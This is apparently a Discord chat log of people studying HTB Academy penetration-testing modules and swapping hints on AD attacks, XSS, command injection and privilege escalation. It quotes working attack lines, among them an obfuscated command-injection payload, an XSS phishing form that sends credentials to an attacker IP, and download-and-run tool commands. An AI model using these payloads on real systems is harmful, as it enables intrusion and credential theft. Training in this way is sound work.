any idea on how to properly validate the password?

The password is not relevant.

lol really

so i just need to validate the ip?

isn't the password is in the eval function?

Yes, but think about how to get rid of them

so not using the eval i guess?

eval is evil

i see

keep asking thing like that and you will get the 👢 read the #rules kid

hi

can i dm you?

no

k

can you give me a tip💡 about the stuff i asked?

again stop asking for dump shit you will get the 👢in your ass

Hey guys, please, I'm really in need for help ❤️ I'd highly appreciate it🥺 anyone who did malware analysis module 4th question in the skills assessment.

What exactly is not working? What do you need help with?

I'm completely clueless as to how to even approach it. It's a bit difficult to explain at the moment since I'm at work right now 😅, just trying to find someone who could help by the time I'm home. Can I dm you and explain it in more detail in like 5 hrs from now? Maybe even earlier a bit.

Yes, write me a dm.
I can't promise that I'll be online at that exact time, but I'll be sure to give you an answer as soon as I'm online.

Awesome! Ty so much 🥰
And it's ok, cause soon as I'm home I'm usually free for 5~6 hrs before I go to sleep lol

Hey guys, on modules where you have to RDP into a host to access a subdomain. Is there a way to pipe my machine throught he RDP node? My issue is that I'm dead tired of having to use weird computer configs to work and would like to have my own tools on hand. Any idea?

TL,DR: I want to pipe my host through a RDP I have access to to access it's subnet

Under Linux Fundamental -> task scheduling -> Questions

Answer the question(s) below to complete this Section and earn cubes!

What is the type of the service of the "syslog.service"? , I've tried using systemctl command to list all services and also trying out every 'type' possible for the answer but it shows ERROR!

Anyone else having trouble connecting to the RDP on the Windows Privilege Escalation Module under the SeImpersonate and SeAssignPrimaryToken section?

https://wiki.archlinux.org/title/systemd, there is an option to get the "type" man page can help

did you single quote the password?

Yup

xfreerdp /v:10.129.222.108 /u:sql_dev /p:'Str0ng_P@ssw0rd!'

can I see a screenshot?

of the error message

Im trying to upload a ss it wont let me

dm you

read #welcome and #rules after that use /verify at #bot-commands to verify your account to send your screenshot here

cheers, ill have that done.

why RDP? there is a chance the user simply isn't allowed to RDP in as that's not what was shown in the section

yeah told him the same

haha yeah my bad, I misread the question. Ive been doing windows boxes back to back connecting via rdp and this one threw me offguard wondering why my RDP is failing lol, I clearly need some sleep lmaoo. I was able to solve the section though thanks to autom4il for the shout.

np, everyone make mistakes

yeah I've been there too. happens 🤷

why are you searching for all services? try searching specifically for the service the question asks for

Im actually having the same issue on the windows privesc module but on the windows server section, RDP is giving me some TLS error

Probably some issue with the infra?

did that using grep in above ss

they had problems yesterday around the same time, but today everything is running smoothly for me

can i DM?

[08:47:26:370] [99488:99489] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

I think theres some issue with the machines on the windows privesc module from my understanding

have you tried the two classics? resetting the machine and switching VPN

Good ideia let me try other vpn profile

Nah still some connection issue, tried UDP & TCP. Ive reseted the machine already like 5 times

try contacting support then, they can probably help you

Will do, thanks!

did you try with the option /sec:tls ?

Just tried still the same error, no ideia why, Ive asked support now

You still having issues?

I seem to be able to connect via RDP on most boxes, but its not the smoothest experience on these boxes. I face lag or the session automatically closes sometimes haha

Yeah same, its a bit laggy this module. Some sections I just spawned a reverse shell since its not so slow as RDP

Yup woulda been a lot easier to just use CLI instead ngl, unless some sections purely need use of GUI to escalate.

when migrating to different framework of javascript do you guys start from the scratch and copy the old files back to the new environment?

AD Enumeration & Attacks - Skills Assessment Part II, anyone able to give me a hint on Q6

Hey! Having some trouble with "advanced command obfuscation" in the command injection module. I'm base64 encoding "find /usr/share/ | grep root | grep mysql | tail -n 1". Getting the ping output but nothing else. When I only encode "find /usr/share/ | grep root | grep mysql |" im getting the expected output. Tried all variants i can think of but not getting the filtered output. This example prints everthing within usr/share: ip=127.0.0.1127.0.0.1%0a$(base64${IFS}-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWw=)%09%<<<%09%24%28r%09"[A-Z]"%09"[a-z]"<<<"tAiL%09%2Dn${IFS}1"%29t any tips?

thax, save me alot of time

Hello everyone, is it possible to use responder over tunneling ?

Or do i need to be in the same network ?

I'd assume you need to be on same network. if you can, simply transfer it over (or use Inveigh if it's windows)

hello, can someone help me with the evaluation of sqlmap, I have the flag but it doesn't work

maybe read the csv file ?

the problem is a special character

Hi guy
I have a Q regarding module: "Active Directory Enumeration & Attacks" : "Living Off the Land"
I found all the required in the Qs, but in the last Q they want 2 find "disabled account with administrative privileges"
how do I know that those accounts R with administrative privileges??

DCs usually have a bunch of shares with tons of files. take a look around

hello guys, I'm stuck on the Exploiting Web Vulnerabilities in Thick-Client Applications part of Attacking Common Applications. I did exactly what the module says: changed host file, changed beans.xml to port 1337, deleted all hashes in MANIFEST.MF (there's a newline there), deleted 1.RSA and 1.SF, and updated the binary. However, when I run it I still get "connection error". I don't understand what I'm doing wrong here.

hosts file, beans.xml, directory, and MANIFEST.

back when I did it, fiddling with the host file would only break it. simply not touching it would do the trick

oh shoot, I don't remember the original IP. have to reset now

do i care?

you don't have to man.

damn dude chill

I'm currently doing the Attacking Enterprise networks, and have noticed that of many domain users I have, only one can connect to the specific machine via WinRM protocol (using evil-winrm) - all others return authorization error. I'm trying to understand what determines which users can connect via that protocol? Is there a way to enumerate users that can do that using the Bloodhound?

This is not necessarily a module question, but a more 'broader' one

just kiding my man

Yes, they taught a custom cipher query for BloodHound which checks for users with PSRemoting privileges. those will be able to use WinRM

Gotcha! I vaguely remember it, but I think I remember where it is

yeah not sure where exactly it was but definitely AD module

Yup, will look for it in a bit ^^

I already have it

if anyone online right now and is willing to help, it'll be awesome
malware analysis module 4th question in skill assessment

Hm, I found it, but it returns 0 results in the Attacking Enterprise Networks module 😐

ugh okay. well then idk what's going on there

AD Enumeration & Attacks - Skills Assessment Part II

I have a shell on SQL01 but I cant work out what to do next, I have tried privesc abusing privilges to no succees. any hints?

the idea is correct. I believe you have a privilege in sight that you can exploit?

yeah I am trying to abuse it to get system but it doesnt want to work

well there is a lazy way to exploit it if you wanna know

lol i think the netcat binary got corrupted when i transfered it

re-transfered across and it works

ugh yeah happens from time to time. always good to compare checksums I guess, even though its tedious

yep,part of the fun

for sure 😄

halo i'm on broken auth skill assesment last step, already change role in cookie, profile text is change but didn't get any flag

now sure if you can use Bloodhound but you can definitely use crackmapexec

shoot me a dm if you still need help with this

Mind giving a hint on what exactly from CME can be used for this?

give me a sec i will look up some stuff if i can't find anything i'll shoot you a dm on how to do it but it's going to be better if you have a blog or an article to gone of

only users that have the required permissions will be able to use winrm, generally that's members of the remote management users group

hint just look for disabled account

quick search for that give me 2 module Injection Attacks and Server-side Attacks, haven't Injection Attacks and i'm not 100% recommended Server-side Attacks because the module is kinda old

I see.. and those are not visible via bloodhound as they're not domain groups?

it can be a domain group I think, I just think bloodhound doesn't show that, but it does show stuff like psremoting and I believe also RDP

this is a bit basic but basically this should work https://wiki.porchetta.industries/winrm-protocol/password-spraying

also GPT said otherwise 🤣 https://chat.openai.com/share/483c856c-f97d-4f17-a33f-7daf57628947

don't know if it is just me but the RDP thing work like 20% of the time for me but mostly false negative so a user would have RDP and bloodhound will not show it

bloodhound is kind of hit and miss sometimes

still an invaluable tool though

yeah the stable or better version got yeeted to enterprise 🤣

gotta love when that happens

So essentially, it's good to attempt evil-winrm with every single user on every single host that hasn't been owned until I get a hit? 😅

if you are stuck yes 🤣

there isn't always going to be a clear path to pwning AD if you've run out thing to try and all host that you pwned and have some cred next best thing is to do some spraying

Yeah, getting to know AD is pretty tough for me, as I come from the web development career and have only been working with Linux for my lifetime, to the point where I'm not strictly comfortable with Windows workstations, not to mention Windows Servers 😅 But oh well, I've recently decided to explore ADs as well which is why I went the CPTS path

Still getting familiar with stuff, trying not to blindly follow it without proper understanding

Hey would just two days of a week enough to complete Comptia security +??

nope

atleast 3-4 you gotta understand concepts and cyber security logic you may forget stuff

unless you have notes you are reviewing everyday

depend on where you at in cyber security but generally nope

Okay thanx

I am working on windows privilege escalation: pillaging I cannot not figure out the last question Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer , I own the hash but it does not accept it as an answer

log rotate section is 💀

no, that's somewhere in my future plans though

Hope someone here can give you some feedback on that

I don't think it is worth 1000 cubes

Just out of curiousity...how many cubes do you think its worth?

I would say tier 2-3

but I don't know how they decide the tier

Am talking having done 55 modules

a module worth it's always going to depend on how much you already know about the module

i know a good bit if AD so same as shockp hell nah the powerview module is 1000 cubes is worth but if i'm new to AD and want to learn how this tool work first hand the this could be worth it but it's all depend on what you know

unlike the powerview tool which kinda old and even though it's a enumeration tool you have to kinda know that you are looking for when using this tool bloodhound have a lot of online public resources here is one to get you started https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/bloodhound

its still good to know both. Bloodhound isnt perfect always in its collecting

oh yea i know that, specifically this has kick me in the ball before when i was doing offshore

pls help

some how it's missed some stuff and i end up stuck for almost a week 🤣 but i mentioned that because the powerview module definitely isn't worth 1000 cubes

unfortunately not that long

oh that's just HTB being evil one of them has the wrong hash and you probably got that one

dump the rest and you will find the right hash

can i dm you

sure

also if you look at the last of the section for this module you can probably google how to do each of them

1000 cubes for a tool that's blocked in most environments 💀

Yes

If evasion is your goal, powershell isn’t the ideal way to go about it

It’s just heavily monitored and/or blocked because of how easy/powerful it is to leverage when it’s not being watched

Powershell isn't the issue it's just blocking known tools without attempting obfuscation

like you can enumerate AD by just importing the .dll for AD module if the box you compromised cannot install rsat (admin privs needed)

powershell necessary evil otherwise IT can't do their job

I just assume obfuscation is part of the process in modern environments 🤷‍♂️

I wouldn’t say the tool is blocked myself but now we’re just talking semantics

just depends on the environment you're in

abandon powershell, embrace LDAP queries

True

I love how you came in here to specifically tell me something I didn't want to hear

dont hate me cause I speak facts

ldap queries make me wanna commit rm -rf

even though it wouldnt be useful cause ldapshell is already I thing, I do at some point want to make a utility for converting ldap extra attributes security descriptors into human readable permissions

I am on the Session Hijacking module where we are to steal the admin cookie via one of the fields vulnerable to XSS on the registration page. . I am receiving the cookie, but the credential is coming back invalid. I have re-tried it 3 times and keep getting the same cookie.

nm, i think I know what I did wrong here

confirmed, completed

discovering your own solution three seconds after asking someone else a question about it is simultaneously the worst and best

yea, I misread something, and realized what I did wrong lol...

I still think u can learn a lot more with the vip in the main app

and much cheaper

I'm on the file upload skills assessment, I've figured out how to read the source code I know the naming scheme, kinda, and I know the directory the feed backs are being uploaded to. If I try to visit the upload directory it get a 404. Can anyone help me understand what I'm missing. I was thinking I'd be able to upload a php shell into the feedback comment section and then navigate to it in the url and be set to cat the flag but I'm not so sure now.

I've been contemplating the "Active Directory LDAP" module. Would you say it's worth it?

Havnt done it

Ive been told that my basic understanding of ldap already eclipses what that module teaches

Active directory enumeration & attacks has a little bit of LDAP iirc, it wasn't alot though

read documentation for ldapsearch and ldapmodify

is pwnbox running slow for anyone else today

First thing, You should Bypass To get a shell
but here you're getting a 404 so Forget the bypaas, Your path to the uploaded file isnt right

Well, I can't get to the parent directory that the files are held in by the url. I would line some advice on understanding the naming scheme code, I may be able to call the file if I can get that right, shouldn't I?

Everything you need is in the file you found initially, go through it again i'm sure you will figure it out

Dude I've been on it for a week and a half I'll look again tomorrow morning thanks

If you couldnt figure it out just dm me

Thanks

how do i get into a acc with a token?

I took the boot camp a couple months ago. Hoping to get the cert test done soon, but having issues with voucher. Anyway, with that said, the whole boot camp was just watching Professor Messer videos. And a lot if it is common sense. dependent on your computer knowledge and security knowledge.

is that a question or a statement?

i'm doing HTB attacking common service hard lab

i'm on question Once logged in, what other user can we compromise to gain admin privileges?

i rdp using f**** creds

went to the users section and in cmd line and none of them are the answer in that directory

any tips for me? greatly apprecaited

How can you check other users ?

once i'm in f**** account i just cd to users

you use the lessons taught in the module

is this command correct

sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30

trying to estable a connection within my rdp env. this example was provided by HTB

Can anyone just help me with this: Perform a Nmap scan of the target. What is the version of the service from the Nmap scan running on port 8080? . I did nmap with -A -sC and scripts such as banner, http-title-http-enum and burpsuite. I was able to get anything. The hint says a simple version scan but even this is not giving me any feedback

try --disable-arp-ping -Pn and -n

maybe -p- -sV or -p- -sV -Pn -n --disable-arp-ping --packet-trace? Doing a similar type question on another module dont recall needing an aggressive scan for it.

this should reveal the banner ncat -nv <ip> <port>

Actually, this ^. What @lusty thicket said.

i hate thick-client vulns lol

Is fundamental good

if the bug bounty path is all different web application hacking techniques, how is it cumulative?

or is it not cumulative?

I'm assuming its different from CPTS that way?

Advanced command injections

right but how do I retain all of the information from the CBBH path as I learn it?

I want to be able to get certification

like CBBH cert

and I'm scared of forgetting stuff

before its time for me to take test

you take notes

ok but even taking notes which I'm doing

wouldn't it be difficult to retain skills as you progress in a pathway if you aren't constantly practicing everything you have learned?

are there any main platform learning paths that would reinforce everything from CBBH pathway?

like OWASP to 10 pathway or other learning paths dedicated to web?

Can someone help me out with Assesment 2 Question 8 in the "Active Directory Enumeration & Attacks" Module?

can anyone give me a hand on the final skills assessment for "Web service and API attacks"?

I have a working command, have the password, cant reverse the md5 hash.

you practice enough until you have a methodology down, the notes make it so that you don't have to memorize specific payloads you like using, or very niche exploitation steps you may have only seen once in the past

Enumerate, examine, exploit repeat

You get the flag in plain text and not as md5 hash.

i'm stuck in this exercise:
What is the IP address of the eth0 interface under the ServerStatus -> Ipconfig tab in the fatty-client application?

someone could help me?

Ive got what I think is the hash and im using the same three methods of connection to no avail

who's hash do you have?

Administrator. but its from mimikatz# lsadump::lsa /inject on the SQL01 host

do you think there might be more hash laying around?

yes but not exactly sure how to look at the cached ones. going to reread through the module and see where dumps are happening for accounts that arent local to that machine

ive attempted looking for users,groups,hashes coming from MS01 to SQL01 and not finding anything

use that advice MarcieLee had above on SQL01

?? the enuumerate examine repeat?

are you saying to use evil-winrm from SQL01 and not the parrot box?

or enumerate for more SQL dbs???

I am saying to thoroughly check out SQL01 try some of the things you have done already...

or do you want me to go ahead and enumerate users???

thats so vague

i'll see what i can see

well I dont want to just give it away... your right there, keep looking, so close

its ALWAYS staring me dead in the eyes

Dont I know that! 🙂

You'll get it, I know the feeling....

klsit

Hello evryone! Hope yall are having a great day!
I'm going through the HTB academy modules and im currently on the DYnamic port forward/tunneling module. I'm currently having an issue using proxychains on kali linux running on WSL2.
I have posted a detailed question here: https://stackoverflow.com/questions/77005573/im-having-problems-with-proxychains-on-wsl2
Any help would be greatly appreciated!
Cheers!

Hello everyone, this is my first time posting on this server, but I encountered a problem in the "Using Web Proxies" module, at the "Burp Intruder" exercise. I managed to find the "index.html" file (using gobuster because it was faster than Intruder), but the file has no flag in it, and I was not able to find another file. Can you please tell me if I did something wrong? Thank you very much!

hi my first time posting on this server, i'm tom and did you use the common.txt wordlist?

on my defense GPT write that dad joke

Hello MRtom, I used the common.txt file with gobuster

from SecLists?

no, from /usr/share/wordlists/dirb , but I will try using that one now

yea that's the issue

This is the result of the scan using the list from SecLists, I get the same index.html file, but it has nothing on it

Am I doing something wrong? or is it a bug?

and you did use -x html right?

No, I did not

but now I found the flag

thanks for the assistance!

I am in Password Attacks Lab: Hard

Can anybody help me with commands to download the file 'Logins.kdbx' file to pwn box?

I keep getting errors..!

you could use base64

a bunch of download methods indeed do not work. however, using evil-winrm will work

yeah that should work too

Ok let me try this one

Can I DM you?

sure

guys is OSCP enough to get a job?

This is better forum to discuss this https://discord.com/channels/473760315293696010/482659243456200705.

i dont have access to it

then head over to #welcome and verify your account. make sure you also read #rules

CROSS-SITE SCRIPTING (XSS)

Phishing

My command is the exact same as the one taught in the section:

document.write('<h3>Please login to continue</h3><form action=http://10.10.16.51><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

But for some reason I get this output on the page:

NVM I guess it doesn't matter, the automated login still occurred even though the page didn't hide the image URL element

if you still want to remove it check this #modules message

also you can change the broken icon into something like the bloodhound dog icon for tool but that's just for fun

Thanks Tom

Hey Guys!

I've got this problem that I just can't figure out...
I'm in the Nibbler blog post at privalige escalation and I'm stuck at the LinEnum.

Everytime, in any way that I'm trying to get a 404 File not Found. I've tried it in the normal way and another way what a blog post toild me to go to /dev/shm. But both give me the same error.
Anyone who can tell me what I'm missing?

are you trying to download a script to the machine?

plut0x00 mean has you download LinEnum to your machine if yes then are you running your python http server in the same directory as the script?

I'm starting to believe that I truly don't understand the assignment 😅
It is at privalige escalation. It says that if I wget this file then I'll get my root access to get the flag.

The instruction is this: Back on the target type wget http://<your ip>:8080/LinEnum.sh to download the script. If successful, we will see a 200 success response on our Python HTTP server. Once the script is pulled over, type chmod +x LinEnum.sh to make the script executable and then type ./LinEnum.sh to run it. We see a ton of interesting output but what immediately catches the eye are sudo privileges.

But I'm getting a 404 file not found

what the section show is you can host that file using python http server on your machine and download on the target machine from your

but the issue here is you need to download the script on to your machine first

yes indeed

so the question still is: are you running your python http server in the same directory as the script?

Do you mean the php exploit script?

nope the LinEnum script

As far as I understood it, I had to run the sudo python script from my HTB virtual machine. Then I had to do th wget script from the target server. Am I wrong there?

That's also wat kinda made sense to my basic knowledge

the python http server will host every file in the directory that it's run it so you need to have the LinEnum script in that same directory

So what you are saying is that I have to look up where the file is on the target directory and run the wget from there?

:))

nope but if @lusty thicket is here he can continue helping you 😂

I'm so utterly confused 😂 but thank you for trying, I really apreciate it

you have to host the python http server in the same directory where the linux enumeration script is

before you access it from the nibbles machine

Ok, I think I know what you mean (might also be that Dutch is my first language)

dont you remember how the alert script looked like? theres a little detail you have forgotten

you have to close the img url tag, then proceed with the script

his problem is the site after the payload doesn't look like the example but everything else is working fine 🤣

Someone able to give me a hint for Windows PrivEsc module, section Credential Hunting? I'm stuck on the first question. I found multiple passwords but none of them seem to be correct. I must be missing something

yeah but the script he's injecting is without closing the img url tag

so the xss payload should be like "> or '> and then proceed with the payload

and he should probably try slapping <script> and </script> tags around the payload because the second script which removes the img url form seems to be rendered as plain text

oh not that part is on on purpose

that's what the section show

it's just that the last document.getElementById('urlform').remove(); bit is supposed to to remove some UI stuff but it doesn't work i found a "fix" for this a while back

i faced that problem too, it worked with script tags

and then commented out the remaining '> with html comment <!--

reading my note for this part seem like i was both drunk and high at the same time 🤣 but hint there is a example about a a ||findstr|| command that look for the word "password" in a ton of file extension and the last one have the right pass

oh yea that's what my dump "fix" was about

@lusty thicket sorry to bother you once more. So I've put the directory of the sudo python3 script on the Desktop path where also my php script is that I uploaded to the server.
But now that I typed it out, this might have been a dumb idea?
I'm completely lost to be honest, it still doesn't work...

btw do u have a job in the cybersecurity industry or are u still learning?

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh; python3 -m http.server 8080 just run this on your machine and run the same wget command on the target machine

ugh yeah found it. there are literally like 10 passwords you can find and you have to guess which one they want -.-

is that the relative path where your linenum.sh script is?

thanks tho

you can do this too🙏

Could anyone help me with the Exploiting Web Vulnerabilities in Thick-Client Applications section of the Attacking Common Applications module? 🙂

yeah I can try. feel free to DM me if you wanna keep it out of this chat

I have a question do y'all take note from module ? And do you use a specific app to take note or just a paper ?

taking notes is very important. I believe the most widespread app used is Obsidian. However there are others in use too, e.g. CherryTree and Notion

Thanks you sir i'll try to take some note

what helps me keep good notes is one simple question I ask myself: Given the notes I have, would I be able to help someone else debug their problems with this section?

give this a look #resources-tools message

Oooh that's an intersting way to take note

Thank you

oh nice same

ah this is awesome, I'll definitely check it out later. I'm still using my old trusty VS Code markdown files, which isn't exactly optimal lol

I do step by steps in notepad and save each .txt as the module or section name. Gonna throw it all into OneNote at some point. This will help me go back later to see if there are other ways to find flags, etc.

for the love of god if you are going to migrate your note to a different platform do it now before you have too much note 🤣

agreed 😂

i've 467 txt note file for the academy 🤣

i'm going to transfer and re-do all of it to obsidian in 2077 😂

oh god good luck with that lol

I'm definitely in the hundreds with my markdown files too but I'm pretty sure Obsidian has to have some kind of import functionality. If not, well then I'm f'ed

Thanksfully I asked the question I only did 3 module

obsidian is a community tool type of thing so there definitely will be but the thing after you done your 20 module and look back at your first module note it's going to be sh!t so you have to change it but if you do then may as well change the rest 🤣 and this is the cycle of writing good note hell

well that's kinda true but by now I've helped so many people and always improved my notes when doing so. They're not perfect, but good enough for the most part

You just copy your markdown files into your Obsidian vault folder and you're good to go

Module: ATTACKING COMMON SERVICES
Section: Attacking DNS
Question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

Okay. I actually already have the flag for this question but I need someone to explain to me why subbrute is the only tool that was able to identify the appropriate subdomains. I tried a handful of other tools (DNSEnum, DNSRecon, and a one-liner loop with a DNS subdomain wordlist but none of them came up with usable results.

For the one-liner, the wordlist DID have the question's correct subdomain name in it. I even went as far as to create a test.txt file containing ONLY the correct subdomain and it still didn't work. It did, however, return a handful of other subdomains for inlanefreight.htb. Trying to figure what the gap here is. Any ideas?

Edit: The one-liner in question: || for sub in $(cat /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.83.105 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done ||

Awesome. Then it looks like I'll be doing that soon

Anyone that can help me with Upload Exploitation in File upload attacks? Should be a pretty straight forward reverse shell, but doesn't work for some reason.

I've tried several reverse shells, most recently the msfvenom and pentestmonkey. Tried several ports and am using tun0 as the ip on the attackbox. Any methodology to know if the problem is the script or the port?

nope you can't get a shell for any target in that module if i remember correctly

all target that have public ip is a docker container and are intended for you to only access the given port to exploit some stuff and get the flag not a shell

oh

I would like to clarify that:
No reverse shell, but web shells are entirely possible

oh yea i guess somemthing like a php bash shell would work but you already have RCE though

the problem is the reverse shell

Yup, you're right. Thanks a lot:)

Another day another learning

awesome 🙂

That was a phenomenal module IMHO.

You are phenomenal mr hillman

I'm getting a weird error with the pwnbox vm. Every time I try to open it in a new window/tab, that new window/tab goes blank after a few seconds and I'm no longer able to interact with the pwnbox instance. Not sure how to go about fixing it.

try refresh that page

I've done that. It pops back up with the pwnbox vm visible for a few seconds and then the whole thing blanks again.

Hi All. I have come across something a little strange. I am working through the CBBH Cert > Using Web Proxies > ZAP Fuzzer page. But when I am running through the question I should be getting a 200 response on the skills directory to get the cookie. But instead getting a 301 Moved Permanently response code. Can someone tell me if this is correct??

you need to get a status 200 for the right cookie only, use top-usernames-shortlist.txt as payload

No I need it to be a 200 first to be able to give me a cookie. Visit '/skills/' to get a request with a cookie, then try to use ZAP

Have sorted it

you need fuzz the cookie with md5 hash processor

this was my first ever module. i loved it

hello there, I have 2 questions about command injection module, is there someone who can explain?

I use Cherrytree but obsidian is nice. I just dont want to pay for it.

yo, long time no see also the obsidian is free but you can pay for the Sync thing if you want

ok, I see, this will be hard.. guys're talkin' about text editors

heyo

i just joined

who can help

sql injection fundamentals, last page where you have to try yourself a machine. i didn't have problems but the hint said something like "check in which directory you have write permission". i found out that the user was able to write in "dashboard" directory randomly after some tests. there was a way for finding it out from sql or it is just common sense? thank you!

spent nearly an hour stuck on a payload & shells question

turns out i just forgot to set a metasploit option and overlooked it continuously

wouldve been done in 5 minutes otherwise

im gonna jump off a building